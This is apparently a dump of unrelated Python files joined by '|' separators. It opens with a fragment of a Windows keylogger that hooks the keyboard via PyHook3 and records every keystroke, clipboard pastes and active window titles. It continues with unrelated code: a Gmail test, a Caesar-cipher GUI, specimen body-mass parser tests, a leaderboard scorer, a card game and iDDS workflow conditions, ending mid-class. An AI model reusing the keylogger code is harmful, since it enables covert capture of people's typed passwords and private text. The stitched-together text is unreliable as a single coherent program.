pid = c_ulong(0)
user32.GetWindowThreadProcessId(hwnd, byref(pid))
# 将进程ID存入变量中
process_id = "%d" % pid.value
# 申请内存
executable = create_string_buffer(bytes.fromhex("00") * 512)
h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)
# 读取窗口标题
windows_title = create_string_buffer(b"\x00" * 512)
length = user32.GetWindowTextA(hwnd, byref(windows_title), 512)
# 打印
print("[ PID:%s-%s-%s]" %
(process_id, executable.value, windows_title.value))
# 关闭handles
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
# 定义击键监听事件函数
def KeyStroke(event):
global current_window
# 检测目标窗口是否转移(换了其他窗口就监听新的窗口)
if event.WindowName != current_window:
current_window = event.WindowName
# 函数调用
get_current_process()
# 检测击键是否常规按键(非组合键等)
if event.Ascii > 32 and event.Ascii < 127:
print(chr(event.Ascii)),
else:
# 如果发现Ctrl+v(粘贴)事件,就把粘贴板内容记录下来
if event.Key == "V":
win32clipboard.OpenClipboard()
pasted_value = win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
print("[PASTE]-%s" % (pasted_value)),
else:
print("[%s]" % event.Key),
# 循环监听下一个击键事件
return True
# 创建并注册hook管理器
kl = PyHook3.HookManager()
kl.KeyDown = KeyStroke
# 注册hook并执行
kl.HookKeyboard()
pythoncom.PumpMessages()
|
import os
import unittest
from je_gmail.core import GmailCore
class TestGmail(unittest.TestCase):
def setUp(self) -> None:
self.Gmail = GmailCore('/test')
def test_log(self):
with open(os.getcwd() + '/test/templates/Email_Template1_Picture.html', 'r+') as File:
content = (File.read())
self.Gmail.Gmail_API.send_mail_attach("410877027@mail.nknu.edu.tw", "410877027@mail.nknu.edu.tw", "Hello",
content, attach_file=os.getcwd() + '/test/images/firefox_test.png',
use_html=True)
File.close()
if __name__ == '__main__':
suite = (unittest.TestLoader().loadTestsFromTestCase(TestGmail))
unittest.TextTestRunner(verbosity=2).run(suite)
|
from tkinter import *
from tkinter import filedialog
from tkinter.filedialog import askopenfilename,asksaveasfilename
from PIL import Image, ImageTk
from dependencies.Cesar import *
from subviews.cesar.EncodeGui import EncodeGui
from subviews.cesar.DecodeGui import DecodeGui
from subviews.cesar.AnalyseGui import AnalyseGui
class CesarGui(Frame):
def __init__(self, master=None):
self.frame = Toplevel(master)
self.master = master
self.init_window()
#Creation of init_window
def init_window(self):
# changing the title of our master widget
#self.master.title("Cesar Encoder-Decoder")
self.frame.configure()
# creating labels
mainTitle = Label(self.frame,text="Cesar Encoder-Decoder",fg="red",font=("Helvetica", 20))
# placing labels
mainTitle.pack(fill=X)
# creating buttons instances
buttonFont = ("Helvetica", 15)
encodeButton = Button(self.frame, text="Encoder un fichier", command = self.encode,font=buttonFont)
decodeButton = Button(self.frame, text="Decoder un fichier", command = self.decode,font=buttonFont)
cryptanalButton = Button(self.frame, text="Cryptanaliser un fichier", command = self.cryptanal,font=buttonFont)
# placing the button on my window
encodeButton.pack(fill=X,padx=100,pady=10)
decodeButton.pack(fill=X,padx=100,pady=10)
cryptanalButton.pack(fill=X,padx=100,pady=10)
def encode(self):
encodeGui = EncodeGui(master = self.master)
def decode(self):
decodeGui = DecodeGui(master=self.master)
def cryptanal(self):
analyseGui = AnalyseGui(master=self.master)
|
"""Test body mass notations."""
# pylint: disable=missing-module-docstring,missing-class-docstring
# pylint: disable=missing-function-docstring,too-many-public-methods
import unittest
from traiter.util import shorten
from vertnet.parsers.body_mass import BODY_MASS
from vertnet.pylib.trait import Trait
class TestBodyMass(unittest.TestCase):
def test_parse_01(self):
self.assertEqual(
BODY_MASS.parse("762-292-121-76 2435.0g"),
[
Trait(
value=2435,
units="g",
units_inferred=False,
is_shorthand=True,
start=0,
end=22,
)
],
)
def test_parse_02(self):
self.assertEqual(
BODY_MASS.parse("TL (mm) 44,SL (mm) 38,Weight (g) 0.77 xx"),
[Trait(value=0.77, units="g", units_inferred=False, start=22, end=37)],
)
def test_parse_03(self):
self.assertEqual(
BODY_MASS.parse("Note in catalog: Mus. SW Biol. NK 30009; 91-0-17-22-62g"),
[
Trait(
value=62,
units="g",
units_inferred=False,
is_shorthand=True,
start=41,
end=55,
)
],
)
def test_parse_04(self):
self.assertEqual(
BODY_MASS.parse("body mass=20 g"),
[Trait(value=20, units="g", units_inferred=False, start=0, end=14)],
)
def test_parse_05(self):
self.assertEqual(
BODY_MASS.parse("2 lbs. 3.1 - 4.5 oz "),
[
Trait(
value=[995.06, 1034.75],
ambiguous_key=True,
units=["lbs", "oz"],
units_inferred=False,
start=0,
end=19,
)
],
)
def test_parse_06(self):
self.assertEqual(
BODY_MASS.parse(
'{"totalLengthInMM":"x", "earLengthInMM":"20", '
'"weight":"[139.5] g" }'),
[
Trait(
value=139.5,
units="g",
units_inferred=False,
estimated_value=True,
start=47,
end=65,
)
],
)
def test_parse_07(self):
self.assertEqual(
BODY_MASS.parse(
'{"fat":"No fat", "gonads":"Testes 10 x 6 mm.", '
'"molt":"No molt",'
' "stomach contents":"Not recorded", "weight":"94 gr."'),
[Trait(value=94, units="gr", units_inferred=False, start=101, end=115)],
)
def test_parse_08(self):
self.assertEqual(
BODY_MASS.parse("Note in catalog: 83-0-17-23-fa64-35g"),
[
Trait(
value=35,
units="g",
units_inferred=False,
is_shorthand=True,
start=17,
end=36,
)
],
)
def test_parse_09(self):
self.assertEqual(
BODY_MASS.parse('{"measurements":"20.2g, SVL 89.13mm" }'),
[Trait(value=20.2, units="g", units_inferred=False, start=2, end=22)],
)
def test_parse_10(self):
self.assertEqual(
BODY_MASS.parse("Body: 15 g"),
[Trait(value=15, units="g", units_inferred=False, start=0, end=10)],
)
def test_parse_11(self):
self.assertEqual(
BODY_MASS.parse("82-00-15-21-tr7-fa63-41g"),
[
Trait(
value=41,
units="g",
units_inferred=False,
is_shorthand=True,
start=0,
end=24,
)
],
)
def test_parse_12(self):
self.assertEqual(
BODY_MASS.parse("weight=5.4 g; unformatted measurements=77-30-7-12=5.4"),
[
Trait(value=5.4, units="g", units_inferred=False, start=0, end=12),
Trait(
value=5.4,
units=None,
units_inferred=True,
is_shorthand=True,
start=39,
end=53,
),
],
)
def test_parse_13(self):
self.assertEqual(
BODY_MASS.parse("unformatted measurements=77-30-7-12=5.4; weight=5.4;"),
[
Trait(
value=5.4,
units=None,
units_inferred=True,
is_shorthand=True,
start=25,
end=39,
),
Trait(value=5.4, units=None, units_inferred=True, start=41, end=51),
],
)
def test_parse_14(self):
self.assertEqual(
BODY_MASS.parse('{"totalLengthInMM":"270-165-18-22-31", '),
[
Trait(
value=31,
units=None,
units_inferred=True,
is_shorthand=True,
start=20,
end=36,
)
],
)
def test_parse_15(self):
self.assertEqual(
BODY_MASS.parse('{"measurements":"143-63-20-17=13 g" }'),
[
Trait(
value=13,
units="g",
units_inferred=False,
is_shorthand=True,
start=17,
end=34,
)
],
)
def test_parse_16(self):
self.assertEqual(
BODY_MASS.parse("143-63-20-17=13"),
[
Trait(
value=13,
units=None,
units_inferred=True,
is_shorthand=True,
start=0,
end=15,
)
],
)
def test_parse_17(self):
self.assertEqual(
BODY_MASS.parse(
"reproductive data: Testes descended -10x7 mm; sex: "
"male; unformatted measurements: 181-75-21-18=22 g"),
[
Trait(
value=22,
units="g",
units_inferred=False,
is_shorthand=True,
start=83,
end=100,
)
],
)
def test_parse_18(self):
self.assertEqual(
BODY_MASS.parse('{ "massingrams"="20.1" }'),
[Trait(value=20.1, units="grams", units_inferred=False, start=3, end=21)],
)
def test_parse_19(self):
self.assertEqual(
BODY_MASS.parse(
' {"gonadLengthInMM_1":"10", "gonadLengthInMM_2":"6", '
'"weight":"1,192.0" }'),
[Trait(value=1192, units=None, units_inferred=True, start=54, end=70)],
)
def test_parse_20(self):
self.assertEqual(
BODY_MASS.parse('"weight: 20.5-31.8'),
[
Trait(
value=[20.5, 31.8],
units=None,
units_inferred=True,
start=1,
end=18)
],
)
def test_parse_21(self):
self.assertEqual(
BODY_MASS.parse('"weight: 20.5-32'),
[Trait(value=[20.5, 32], units=None, units_inferred=True, start=1, end=16)],
)
def test_parse_22(self):
self.assertEqual(
BODY_MASS.parse('"weight: 21-31.8'),
[Trait(value=[21, 31.8], units=None, units_inferred=True, start=1, end=16)],
)
def test_parse_23(self):
self.assertEqual(
BODY_MASS.parse('"weight: 21-32'),
[Trait(value=[21, 32], units=None, units_inferred=True, start=1, end=14)],
)
def test_parse_24(self):
self.assertEqual(BODY_MASS.parse("Specimen #'s - 5491,5492"), [])
def test_parse_25(self):
self.assertEqual(
BODY_MASS.parse("weight=5.4 g; unformatted measurements=77-x-7-12=5.4"),
[
Trait(value=5.4, units="g", units_inferred=False, start=0, end=12),
Trait(
value=5.4,
units=None,
units_inferred=True,
is_shorthand=True,
start=39,
end=52,
),
],
)
def test_parse_26(self):
self.assertEqual(BODY_MASS.parse("c701563b-dbd9-4500-184f-1ad61eb8da11"), [])
def test_parse_27(self):
self.assertEqual(
BODY_MASS.parse("body mass=0 g"),
[Trait(value=0, units="g", units_inferred=False, start=0, end=13)],
)
def test_parse_28(self):
self.assertEqual(
BODY_MASS.parse("2 lbs. 3.1 oz "),
[
Trait(
value=995.06,
ambiguous_key=True,
units=["lbs", "oz"],
units_inferred=False,
start=0,
end=13,
)
],
)
def test_parse_29(self):
self.assertEqual(
BODY_MASS.parse(
"Note in catalog: Mus. SW Biol. NK 30009; 91-0-17-22-[62]g"),
[
Trait(
value=62,
units="g",
units_inferred=False,
is_shorthand=True,
estimated_value=True,
start=41,
end=57,
)
],
)
def test_parse_30(self):
self.assertEqual(
BODY_MASS.parse(
"Note in catalog: Mus. SW Biol. NK 30009; 91-0-17-22-[62g]"),
[
Trait(
value=62,
units="g",
units_inferred=False,
is_shorthand=True,
estimated_value=True,
start=41,
end=57,
)
],
)
def test_parse_31(self):
self.assertEqual(
BODY_MASS.parse(
"Note in catalog: Mus. SW Biol. NK 30009; 91-0-17-22-[62] x"),
[],
)
def test_parse_32(self):
self.assertEqual(
BODY_MASS.parse("wt=10 g"),
[Trait(value=10, units="g", units_inferred=False, start=0, end=7)],
)
def test_parse_33(self):
self.assertEqual(
BODY_MASS.parse("w.t.=10 g"),
[Trait(value=10, units="g", units_inferred=False, start=0, end=9)],
)
def test_parse_34(self):
self.assertEqual(
BODY_MASS.parse(
"DATA HISTORY: Inventory catalogued/verified by "
"Collections staff (2008-2010 inventory). Record last "
"updated in Excel (prior to Arctos migration) by Dawn "
"R. Roberts (2013-11-30). Date listed as entered in "
"original FileMaker database: 1988-07-29."),
[],
)
def test_parse_35(self):
self.assertEqual(
BODY_MASS.parse("; weight = [50.8] g ;"),
[
Trait(
value=50.8,
units="g",
units_inferred=False,
estimated_value=True,
start=2,
end=19,
)
],
)
def test_parse_36(self):
self.assertEqual(BODY_MASS.parse('{"measurements":"242-109-37-34=N/D" }'), [])
def test_parse_37(self):
self.assertEqual(
BODY_MASS.parse("ear from notch=9 mm; weight=.65 kg; reproductive data"),
[Trait(value=650, units="kg", units_inferred=False, start=21, end=34)],
)
def test_parse_38(self):
self.assertEqual(
BODY_MASS.parse("; weight=22 oz; Verbatim weight=1lb 6oz;"),
[
Trait(value=623.69, units="oz", units_inferred=False, start=2, end=14),
Trait(
value=623.69,
units=["lb", "oz"],
units_inferred=False,
start=25,
end=39,
),
],
)
def test_parse_39(self):
self.assertEqual(BODY_MASS.parse("bacu wt=0.09"), [])
def test_parse_40(self):
self.assertEqual(BODY_MASS.parse("femur wt=1.05"), [])
def test_parse_41(self):
self.assertEqual(
BODY_MASS.parse(
'{"created": "2014-10-29", "relatedresourceid": '
'"eeba8b10-040e-4477-a0a6-870102b56234;'
'abbf14f5-1a7c-48f6-8f2f-2a8af53c8c86"}'),
[],
)
def test_parse_42(self):
self.assertEqual(
BODY_MASS.parse(
'{"created": "2007-05-27", "relatedresourceid": '
'"92bc5a20-577e-4504-aab6-bb409d06871a;'
'0460ccc4-a461-43ec-86b6-1c252377b126"}'),
[],
)
def test_parse_43(self):
self.assertEqual(
BODY_MASS.parse(
'{"created": "2014-10-29", "relatedresourceid": '
'"57d3efd8-2b9c-4952-8976-e27401a01251;'
'8a35be5e-27fb-4875-81f6-42a5d7787760"}'),
[],
)
def test_parse_44(self):
self.assertEqual(
BODY_MASS.parse("Weight=22 lbs., 7 oz.; Length=41 in. T.L."),
[
Trait(
value=10177.48,
units=["lbs", "oz"],
units_inferred=False,
start=0,
end=20,
)
],
)
def test_parse_45(self):
self.assertEqual(
BODY_MASS.parse('{"earLengthInmm":"X", "weightInlbs":"22"}'),
[Trait(value=9979.03, units="lbs", units_inferred=False, start=23, end=39)],
)
def test_parse_46(self):
self.assertEqual(
BODY_MASS.parse('{"measurements":"90-30-16-7=6.9MGS" }'),
[
Trait(
value=0.01,
units="MGS",
units_inferred=False,
is_shorthand=True,
start=17,
end=34,
)
],
)
def test_parse_47(self):
self.assertEqual(BODY_MASS.parse("; unformatted measurements=g 0.24 mm ;"), [])
def test_parse_48(self):
self.assertEqual(
BODY_MASS.parse("143-63-20-17-22=13"),
[
Trait(
value=13,
units=None,
units_inferred=True,
is_shorthand=True,
start=0,
end=18,
)
],
)
def test_parse_49(self):
self.assertEqual(
BODY_MASS.parse(
'{"earLengthInMM":"15 mm", "hindfootLengthInMM":'
'"hind_foot_length]", "measurements":"38", "tail":"40 mm", '
'"totalLength":"96 mm", "weight":"11.7 g" }'),
[Trait(value=11.7, units="g", units_inferred=False, start=129, end=144)],
)
def test_parse_50(self):
self.assertEqual(BODY_MASS.parse("Other Measurements: ratio=.33"), [])
def test_parse_51(self):
self.assertEqual(
BODY_MASS.parse(
shorten(
"""
Body: 12 gm; Body and tail: 109 mm; Tail: 43 mm;
Hind Foot: 11 mm; Ear: 13 mm""")),
[Trait(value=12, units="gm", units_inferred=False, start=0, end=11)],
)
def test_parse_52(self):
self.assertEqual(
BODY_MASS.parse(
shorten(
"""
{"measurements":"78-39-5-14-8(TR)-30(FA)",
"weightInGrams":"3.5" }""")),
[{
"start": 44,
"end": 63,
"units": "Grams",
"value": 3.5,
"units_inferred": False,
}],
)
def test_parse_53(self):
self.assertEqual(
BODY_MASS.parse(
shorten(
"""
all measurements given in specimens 11041-11070 are:
""")),
[],
)
|
# This is a simple script to check if your parameter file is valid. Run it with the location of your parameter
# file as a command line argument (i.e. 'python testParams.py PATH/TO/PARAMFILE'). If successful, a message displaying
# custom parameters specified will be printed. If validation fails, an error message specifying cause of validation
# error will be printed.
import sys
import pykwalify.core
from radiomics import getParameterValidationFiles
def main(paramsFile):
schemaFile, schemaFuncs = getParameterValidationFiles()
c = pykwalify.core.Core(source_file=paramsFile, schema_files=[schemaFile], extensions=[schemaFuncs])
try:
params = c.validate()
print('Parameter validation successfull!\n\n'
'###Enabled Features###\n%s\n'
'###Enabled Image Types###\n%s\n'
'###Settings###\n%s' % (params['featureClass'], params['imageType'], params['setting']))
except Exception as e:
print('Parameter validation failed!\n%s' % e.message)
if __name__ == '__main__' and len(sys.argv) > 1:
main(sys.argv[1])
|
import cauldron as cd
from bokeh.plotting import figure
plot = figure()
plot.line(x=[1, 2, 3], y=[3, 4, 5])
plot.scatter(x=[1, 2, 3], y=[3, 4, 5])
cd.display.bokeh(plot)
|
import pandas as pd
from leaderboard.constants import scoreWeights
from leaderboard.constants import contribTypes
def get_final_score_table(
intermediate_score_df: pd.DataFrame, user_list: list
) -> pd.DataFrame:
""" Returns final score table dataframe
Args:
df: pandas DataFrame - Intermediate Score Table containing contribution counts of all sub types for given users
"""
intermediate_score_df.set_index("user_name", inplace=True)
final_score_table = pd.DataFrame(
columns=[
"User Name",
contribTypes.T1,
contribTypes.T2,
contribTypes.T3,
contribTypes.T4,
"Total Score",
]
)
for user_name in user_list:
t1_score, t2_score, t3_score, t4_score, total_score = (
0,
0,
0,
0,
0,
)
try:
user_row = intermediate_score_df.loc[user_name]
t1_score = (
user_row.t1s1 * scoreWeights.T1S1 + user_row.t1s2 * scoreWeights.T1S2
)
t2_score = (
user_row.t2s1 * scoreWeights.T2S1
+ user_row.t2s2 * scoreWeights.T2S2
+ user_row.t2s3 * scoreWeights.T2S3
+ user_row.t2s4 * scoreWeights.T2S4
)
t3_score = (
user_row.t3s1 * scoreWeights.T3S1 + user_row.t3s2 * scoreWeights.T3S2
)
t4_score = (
user_row.t4s1 * scoreWeights.T4S1
+ user_row.t4s2 * scoreWeights.T4S2
+ user_row.t4s3 * scoreWeights.T4S3
+ user_row.t4s4 * scoreWeights.T4S4
)
total_score = t1_score + t2_score + t3_score + t4_score
final_score_table = final_score_table.append(
{
"User Name": user_name,
contribTypes.T1: t1_score,
contribTypes.T2: t2_score,
contribTypes.T3: t3_score,
contribTypes.T4: t4_score,
"Total Score": total_score,
},
ignore_index=True,
)
except KeyError:
final_score_table = final_score_table.append(
{
"User Name": user_name,
contribTypes.T1: t1_score,
contribTypes.T2: t2_score,
contribTypes.T3: t3_score,
contribTypes.T4: t4_score,
"Total Score": total_score,
},
ignore_index=True,
)
return final_score_table.sort_values(
by=["Total Score", "User Name"], ascending=[False, True]
)
|
"""
Define how `Players` make moves.
"""
from typing import List
from literature.actor import Actor
from literature.card import Card
from literature.constants import SETS
class Move:
"""
An expression that indicates when one `Player` asks another for a `Card`.
Examples
--------
>>> move = player_0.asks(player_1).to_give(CardName(3, Suit.SPADES))
"""
def __init__(self,
interrogator: Actor,
respondent: Actor,
card: Card.Name):
if card in interrogator.hand:
raise ValueError("A player cannot ask for a card they possess")
if sum([
Card.Name(c, card.suit) in interrogator.hand
for c in SETS[card.half_suit().half]
]) == 0:
raise ValueError("The player needs at least one card in the set")
self.interrogator = interrogator
self.respondent = respondent
self.card = card
def serialize(self) -> List[int]:
""" Serialize this `Move` into a list of integers. """
return [
self.interrogator.unique_id,
self.respondent.unique_id,
self.card.suit.value,
self.card.rank.value
]
def __repr__(self):
return "{0} requested the {1} from {2}".format(self.interrogator,
self.card,
self.respondent)
class Request:
"""
A `Request` from one `Player` for another `Player`'s `Card`, without
specifying the `Card`. This should be instantiated using `Player.asks`.
"""
def __init__(self, interrogator: Actor, respondent: Actor):
if interrogator.unique_id % 2 == respondent.unique_id % 2:
raise ValueError("A player cannot ask their teammate for a card")
self.interrogator = interrogator
self.respondent = respondent
def to_give(self, card: Card.Name) -> Move:
return Move(self.interrogator, self.respondent, card)
|
from enum import IntEnum
class ClusterPyError(IntEnum):
ciao_not_running = -1
sources_or_exclude_not_found = 1
|
# https://www.codechef.com/LRNDSA01/problems/FLOW007
for T in range(int(input())): print(int(input()[::-1]))
|
#!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0OA
#
# Authors:
# - Wen Guan, <wen.guan@cern.ch>, 2020 - 2021
import copy
import datetime
import logging
import inspect
import random
import time
import uuid
from idds.common import exceptions
from idds.common.constants import IDDSEnum, WorkStatus
from idds.common.utils import json_dumps, setup_logging, get_proxy
from idds.common.utils import str_to_date
from .base import Base
from .work import Work, Collection
setup_logging(__name__)
class ConditionOperator(IDDSEnum):
And = 0
Or = 1
class ConditionTrigger(IDDSEnum):
NotTriggered = 0
ToTrigger = 1
Triggered = 2
class CompositeCondition(Base):
def __init__(self, operator=ConditionOperator.And, conditions=[], true_works=None, false_works=None, logger=None):
self._conditions = []
self._true_works = []
self._false_works = []
super(CompositeCondition, self).__init__()
self.internal_id = str(uuid.uuid4())[:8]
self.template_id = self.internal_id
# self.template_id = str(uuid.uuid4())[:8]
self.logger = logger
if self.logger is None:
self.setup_logger()
if conditions is None:
conditions = []
if true_works is None:
true_works = []
if false_works is None:
false_works = []
if conditions and type(conditions) not in [tuple, list]:
conditions = [conditions]
if true_works and type(true_works) not in [tuple, list]:
true_works = [true_works]
if false_works and type(false_works) not in [tuple, list]:
false_works = [false_works]
self.validate_conditions(conditions)
self.operator = operator
self.conditions = []
self.true_works = []
self.false_works = []
self.conditions = conditions
self.true_works = true_works
self.false_works = false_works
def get_class_name(self):
return self.__class__.__name__
def get_internal_id(self):
return self.internal_id
def get_template_id(self):
return self.template_id
def copy(self):
new_cond = copy.deepcopy(self)
return new_cond
def __deepcopy__(self, memo):
logger = self.logger
self.logger = None
cls = self.__class__
result = cls.__new__(cls)
memo[id(self)] = result
# Deep copy all other attributes
for k, v in self.__dict__.items():
setattr(result, k, copy.deepcopy(v, memo))
self.logger = logger
result.logger = logger
return result
@property
def conditions(self):
# return self.get_metadata_item('true_works', [])
return self._conditions
@conditions.setter
def conditions(self, value):
self._conditions = value
@property
def true_works(self):
# return self.get_metadata_item('true_works', [])
return self._true_works
@true_works.setter
def true_works(self, value):
self._true_works = value
true_work_meta = self.get_metadata_item('true_works', {})
for work in value:
if work is None:
continue
if isinstance(work, Work):
if work.get_internal_id() not in true_work_meta:
true_work_meta[work.get_internal_id()] = {'triggered': False}
elif isinstance(work, CompositeCondition):
if work.get_internal_id() not in true_work_meta:
true_work_meta[work.get_internal_id()] = {'triggered': False}
elif isinstance(work, Workflow):
if work.get_internal_id() not in true_work_meta:
true_work_meta[work.get_internal_id()] = {'triggered': False}
self.add_metadata_item('true_works', true_work_meta)
@property
def false_works(self):
# return self.get_metadata_item('false_works', [])
return self._false_works
@false_works.setter
def false_works(self, value):
self._false_works = value
false_work_meta = self.get_metadata_item('false_works', {})
for work in value:
if work is None:
continue
if isinstance(work, Work):
if work.get_internal_id() not in false_work_meta:
false_work_meta[work.get_internal_id()] = {'triggered': False}
elif isinstance(work, CompositeCondition):
if work.get_internal_id() not in false_work_meta:
false_work_meta[work.get_internal_id()] = {'triggered': False}
elif isinstance(work, Workflow):
if work.get_internal_id() not in false_work_meta:
false_work_meta[work.get_internal_id()] = {'triggered': False}
self.add_metadata_item('false_works', false_work_meta)
def validate_conditions(self, conditions):
if type(conditions) not in [tuple, list]:
raise exceptions.IDDSException("conditions must be list")
for cond in conditions:
assert(inspect.ismethod(cond))
def add_condition(self, cond):
assert(inspect.ismethod(cond))
assert(isinstance(cond.__self__, Work))
# self.conditions.append({'condition': cond, 'current_work': cond.__self__})
self._conditions.append(cond)
def load_metadata(self):
# conditions = self.get_metadata_item('conditions', [])
# true_works_meta = self.get_metadata_item('true_works', {})
# false_works_meta = self.get_metadata_item('false_works', {})
pass
def to_dict(self):
# print('to_dict')
ret = {'class': self.__class__.__name__,
'module': self.__class__.__module__,
'attributes': {}}
for key, value in self.__dict__.items():
# print(key)
# print(value)
# if not key.startswith('__') and not key.startswith('_'):
if not key.startswith('__'):
if key == 'logger':
value = None
elif key == '_conditions':
new_value = []
for cond in value:
if inspect.ismethod(cond):
if isinstance(cond.__self__, Work):
new_cond = {'idds_method': cond.__name__,
'idds_method_internal_id': cond.__self__.get_internal_id()}
elif isinstance(cond.__self__, CompositeCondition):
new_cond = {'idds_method': cond.__name__,
'idds_method_condition': cond.__self__.to_dict()}
elif isinstance(cond.__self__, Workflow):
new_cond = {'idds_method': cond.__name__,
'idds_method_internal_id': cond.__self__.get_internal_id()}
else:
new_cond = {'idds_method': cond.__name__,
'idds_method_internal_id': cond.__self__.get_internal_id()}
else:
if hasattr(cond, '__self__'):
new_cond = {'idds_attribute': cond.__name__,
'idds_method_internal_id': cond.__self__.get_internal_id()}
else:
new_cond = cond
new_value.append(new_cond)
value = new_value
elif key in ['_true_works', '_false_works']:
new_value = []
for w in value:
if isinstance(w, Work):
new_w = w.get_internal_id()
elif isinstance(w, CompositeCondition):
new_w = w.to_dict()
elif isinstance(w, Workflow):
new_w = w.to_dict()
else:
new_w = w
new_value.append(new_w)
value = new_value
else:
value = self.to_dict_l(value)
ret['attributes'][key] = value
return ret
def get_work_from_id(self, work_id, works):
return works[work_id]
def load_conditions(self, works):
new_conditions = []
for cond in self.conditions:
if callable(cond):
new_conditions.append(cond)
else:
if 'idds_method' in cond and 'idds_method_internal_id' in cond:
internal_id = cond['idds_method_internal_id']
work = self.get_work_from_id(internal_id, works)
if work is not None:
new_cond = getattr(work, cond['idds_method'])
else:
self.logger.error("Work cannot be found for %s" % (internal_id))
new_cond = cond
elif 'idds_attribute' in cond and 'idds_method_internal_id' in cond:
internal_id = cond['idds_method_internal_id']
work = self.get_work_from_id(internal_id, works)
if work is not None:
new_cond = getattr(work, cond['idds_attribute'])
else:
self.logger.error("Work cannot be found for %s" % (internal_id))
new_cond = cond
elif 'idds_method' in cond and 'idds_method_condition' in cond:
new_cond = cond['idds_method_condition']
new_cond = getattr(new_cond, cond['idds_method'])
else:
new_cond = cond
new_conditions.append(new_cond)
self.conditions = new_conditions
new_true_works = []
for w in self.true_works:
if isinstance(w, CompositeCondition) or isinstance(w, Workflow):
# work = w.load_conditions(works, works_template)
w.load_conditions(works)
work = w
elif type(w) in [str]:
work = self.get_work_from_id(w, works)
if work is None:
self.logger.error("Work cannot be found for %s" % str(w))
work = w
else:
self.logger.error("Work cannot be found for %s" % str(w))
work = w
new_true_works.append(work)
self.true_works = new_true_works
new_false_works = []
for w in self.false_works:
if isinstance(w, CompositeCondition) or isinstance(w, Workflow):
# work = w.load_condtions(works, works_template)
w.load_conditions(works)
work = w
elif type(w) in [str]:
work = self.get_work_from_id(w, works)
if work is None:
self.logger.error("Work cannot be found for %s" % str(w))
work = w
else:
self.logger.error("Work cannot be found for %s" % str(w))
work = w
new_false_works.append(work)
self.false_works = new_false_works
def all_works(self):
works = []
works = works + self.all_pre_works()
works = works + self.all_next_works()
return works
def all_condition_ids(self):
works = []
for cond in self.conditions:
if inspect.ismethod(cond):
if isinstance(cond.__self__, Work) or isinstance(cond.__self__, Workflow):
works.append(cond.__self__.get_internal_id())
elif isinstance(cond.__self__, CompositeCondition):
works = works + cond.__self__.all_condition_ids()
else:
self.logger.error("cond cannot be recognized: %s" % str(cond))
works.append(cond)
for work in self.true_works + self.false_works:
if isinstance(work, CompositeCondition):
works = works + work.all_condition_ids()
return works
def all_pre_works(self):
works = []
for cond in self.conditions:
if inspect.ismethod(cond):
if isinstance(cond.__self__, Work) or isinstance(cond.__self__, Workflow):
works.append(cond.__self__)
elif isinstance(cond.__self__, CompositeCondition):
works = works + cond.__self__.all_pre_works()
else:
self.logger.error("cond cannot be recognized: %s" % str(cond))
works.append(cond)
for work in self.true_works + self.false_works:
if isinstance(work, CompositeCondition):
works = works + work.all_pre_works()
return works
def all_next_works(self):
works = []
for work in self.true_works + self.false_works:
if isinstance(work, CompositeCondition):
works = works + work.all_next_works()
else:
works.append(work)
return works
def get_current_cond_status(self, cond):
if callable(cond):
if cond():
return True
else:
return False
else:
if cond:
return True
else:
return False
def get_cond_status(self):
if self.operator == ConditionOperator.And:
for cond in self.conditions:
if not self.get_current_cond_status(cond):
return False
return True
else:
for cond in self.conditions:
if self.get_current_cond_status(cond):
return True
return False
def get_condition_status(self):
return self.get_cond_status()
def is_condition_true(self):
if self.get_cond_status():
return True
return False
def is_condition_false(self):
if not self.get_cond_status():
return True
return False
def get_next_works(self, trigger=ConditionTrigger.NotTriggered):
works = []
if self.get_cond_status():
true_work_meta = self.get_metadata_item('true_works', {})
for work in self.true_works:
if isinstance(work, CompositeCondition):
works = works + work.get_next_works(trigger=trigger)
else:
if work.get_internal_id() not in true_work_meta:
true_work_meta[work.get_internal_id()] = {'triggered': False}
if trigger == ConditionTrigger.ToTrigger:
if not true_work_meta[work.get_internal_id()]['triggered']:
true_work_meta[work.get_internal_id()]['triggered'] = True
works.append(work)
elif trigger == ConditionTrigger.NotTriggered:
if not true_work_meta[work.get_internal_id()]['triggered']:
works.append(work)
elif trigger == ConditionTrigger.Triggered:
if true_work_meta[work.get_internal_id()]['triggered']:
works.append(work)
self.add_metadata_item('true_works', true_work_meta)
else:
false_work_meta = self.get_metadata_item('false_works', {})
for work in self.false_works:
if isinstance(work, CompositeCondition):
works = works + work.get_next_works(trigger=trigger)
else:
if work.get_internal_id() not in false_work_meta:
false_work_meta[work.get_internal_id()] = {'triggered': False}
if trigger == ConditionTrigger.ToTrigger:
if not false_work_meta[work.get_internal_id()]['triggered']:
false_work_meta[work.get_internal_id()]['triggered'] = True
works.append(work)
elif trigger == ConditionTrigger.NotTriggered:
if not false_work_meta[work.get_internal_id()]['triggered']:
works.append(work)
elif trigger == ConditionTrigger.Triggered:
if false_work_meta[work.get_internal_id()]['triggered']:
works.append(work)
self.add_metadata_item('false_works', false_work_meta)
return works
class AndCondition(CompositeCondition):
def __init__(self, conditions=[], true_works=None, false_works=None, logger=None):
super(AndCondition, self).__init__(operator=ConditionOperator.And,
conditions=conditions,
true_works=true_works,
false_works=false_works,
logger=logger)
class OrCondition(CompositeCondition):
def __init__(self, conditions=[], true_works=None, false_works=None, logger=None):
super(OrCondition, self).__init__(operator=ConditionOperator.Or,
conditions=conditions,
true_works=true_works,
false_works=false_works,
logger=logger)
class Condition(CompositeCondition):
def __init__(self, cond=None, current_work=None, true_work=None, false_work=None, logger=None):
super(Condition, self).__init__(operator=ConditionOperator.And,
conditions=[cond] if cond else [],
true_works=[true_work] if true_work else [],
false_works=[false_work] if false_work else [],
logger=logger)
# to support load from old conditions
@property
def cond(self):
# return self.get_metadata_item('true_works', [])
return self.conditions[0] if len(self.conditions) >= 1 else None
@cond.setter
def cond(self, value):
self.conditions = [value]
@property
def true_work(self):
# return self.get_metadata_item('true_works', [])
return self.true_works if len(self.true_works) >= 1 else None
@true_work.setter
def true_work(self, value):
self.true_works = [value]
@property
def false_work(self):
# return self.get_metadata_item('true_works', [])
return self.false_works if len(self.false_works) >= 1 else None
@false_work.setter
def false_work(self, value):
self.false_works = [value]
class TemplateCondition(CompositeCondition):
def __init__(self, cond=None, current_work=None, true_work=None, false_work=None, logger=None):
